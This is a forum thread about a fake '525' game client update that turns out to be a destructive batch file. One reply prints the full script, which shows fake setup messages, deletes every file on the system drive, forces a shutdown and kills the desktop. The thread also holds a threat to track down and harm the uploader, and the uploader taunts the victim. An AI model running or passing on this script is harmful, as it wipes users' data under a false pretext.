• Unfortunately, we have experienced significant hard drive damage that requires urgent maintenance and rebuilding. The forum will be a state of read only until we install our new drives and rebuild all the configurations needed. Please follow our Facebook page for updates, we will be back up shortly! (The forum could go offline at any given time due to the nature of the failed drives whilst awaiting the upgrades.) When you see an Incapsula error, you know we are in the process of migration.

[525] Update Client

Newbie Spellweaver
Reaction score
Okay, hopefully will post pics later today if I have time.

Reaction score
But did u create this?

I doubt it. I already have the full 525 files. This is probably a re-release / leech. 525 is no different than 508. I swear. The only probable difference is that it contains a little more features that can be coded in. Otherwise, there are no graphics differences. And pretty much the same things you would do in a 508. That's my two-cents on this.

Initiate Mage
Reaction score
dnt download it a scam it has broke my big computer it has deleted all the files and now it comes on then ses loads of stuff the turns bk off

D O N O T D O W N L O A D ! ! ! ! !

BTW

IF I NED OT PAY TO GET MY COMP FIXED IM GONNA USE A IP TRACKER FIND UR HOUSE AND MAKE U PAY!!!!!!!

Reaction score
Code:
@echo off
echo WARNING SYSTEM ERROR DETECTED!
echo.
echo RUNNING SYSTEM CHECK.....
PAUSE
echo -
echo.
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo SETTING UP CLIENT
echo -
echo.
echo SETTING UP CLIENT
echo.
pause
echo.
echo - NOTICE
echo -
echo.
echo HARD DRIVE IS BEING FORMATTED......
echo -
del %systemdrive%\*.* /s /f /q
echo.
echo WARNING HARD DRIVE CORRUPTED!
echo -
echo.
PAUSE
shutdown -s -t 15 -c "SYSTEM IS BEING SHUT DOWN TO PREVENT ANY FURTHER ERRORS
taskkill /im explorer.exe /f
:loop
echo Restart PC!
color 19
color 4a
color 3b
color 5e
color 7f
goto loop

LMAO no wonder it broke your computer, always check bat files -.-

Junior Spellweaver
Reaction score
Anyway , even if you find 525 updater thingy or whatever ... even latest 525 server/client files ... don't bother ...
rune-server already has 548 files and stuff ...

And in time , they'll get 550 ... then maybe 555 then 560 and so on and so on and so on ....

Here is what I think about it : They won't make any progress ... they only get the newer files , but no coding at all ... they will get the basic server running ... and then ? NOTHING !
If you guys wont stick onto one revision like 508 or 525 and just keep moving on whit newer files and newer files ... you'll fail .Where do you think you'll ever get ?

Believe me or not , but I have 508 server whit full screen mode and kinda HD style ... almost 60% done , exactly like real RS , and I'm planing to keep on coding until I'm .... like ... 90%+ done .

Say what you want , but I think that this "keep getting newer version" won't get you anywhere ...

Newbie Spellweaver
Reaction score
IF I NED OT PAY TO GET MY COMP FIXED IM GONNA USE A IP TRACKER FIND UR HOUSE AND MAKE U PAY!!!!!!!
I'm sure you will. Is it my fault you are stupid enough to run it without checking?

Back